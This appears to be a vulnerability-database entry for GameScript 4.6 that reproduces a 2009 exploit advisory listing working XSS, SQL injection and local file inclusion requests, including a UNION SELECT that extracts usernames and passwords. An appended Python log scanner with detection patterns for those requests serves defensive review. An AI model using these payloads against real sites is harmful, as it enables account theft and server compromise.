gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion

Vulnerability ID: 1057374
Vulnerability type:
Published: 2009-01-28
Updated: 2009-01-28
CVE ID: N/A
CNNVD-ID: N/A
Platform: PHP
CVSS score: N/A
|Vulnerability source
https://www.exploit-db.com/exploits/7893
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit (EXP)
GameScript 4.6 Multiple Vulnerabilities
(Earlier versions might be affected)

By : Encrypt3d.M!nd

Demo :www.gsdemo.com
just bored  :) 
There are other vulnerabilities I think

I am Iraqian...Not Arabian
###################################################

Xss :

/games.php?search="<script>alert(666);</script>


Sql injection :

/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*

Local File Include :

/page.php?page=file_to_include

# milw0rm.com [2009-01-28]
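
For defenders reviewing web server logs of a GameScript install, the three request shapes listed above can be flagged with a short script. This is an added example, not part of the original advisory or of GameScript itself. It assumes combined-format access logs and a site-maintained allowlist of legitimate page= values (only "viewprofile" is visible in the advisory); the names classify, scan, KNOWN_PAGES and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: allowlist of legitimate page= values. "viewprofile" is the only
# one visible in the advisory; extend it with the site's real page names.
KNOWN_PAGES = {"viewprofile"}
MARKUP = re.compile(r"<\s*/?\s*script\b", re.I)                  # script tag in search=
SQL_META = re.compile(r"\bunion\b.*\bselect\b|/\*", re.I | re.S)  # UNION SELECT or comment
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return sorted labels for the advisory's request shapes that target matches."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    script = parts.path.rsplit("/", 1)[-1].lower()
    hits = set()
    if script == "games.php" and any(MARKUP.search(v) for v in params.get("search", [])):
        hits.add("xss")
    if script == "page.php":
        if any(SQL_META.search(v) for v in params.get("user", [])):
            hits.add("sqli")
        # Any page= value outside the allowlist is treated as an include attempt.
        if any(v not in KNOWN_PAGES for v in params.get("page", [])):
            hits.add("lfi")
    return sorted(hits)

def scan(log_lines):
    """Return (line_number, labels) for access-log lines with at least one hit."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        labels = classify(match.group(1)) if match else []
        if labels:
            findings.append((number, labels))
    return findings

# Constructed sample lines (combined log format, documentation IP addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2009:10:00:01 +0000] "GET /page.php?page=viewprofile&user=alice HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Jan/2009:10:00:07 +0000] "GET /games.php?search=%22%3Cscript%3Ealert(666);%3C/script%3E HTTP/1.1" 200 4096',
    '192.0.2.44 - - [28/Jan/2009:10:00:09 +0000] "GET /page.php?page=viewprofile&user=-x\'%20union%20select%201,2,username%20from%20users/* HTTP/1.1" 200 812',
    '192.0.2.44 - - [28/Jan/2009:10:00:12 +0000] "GET /page.php?page=file_to_include HTTP/1.1" 200 97',
]

if __name__ == "__main__":
    for number, labels in scan(SAMPLE_LOG):
        print(number, ",".join(labels))
```

A hit only shows that a request matched one of the advisory's shapes; whether it succeeded has to be judged from the response size and status and from the application's own logs.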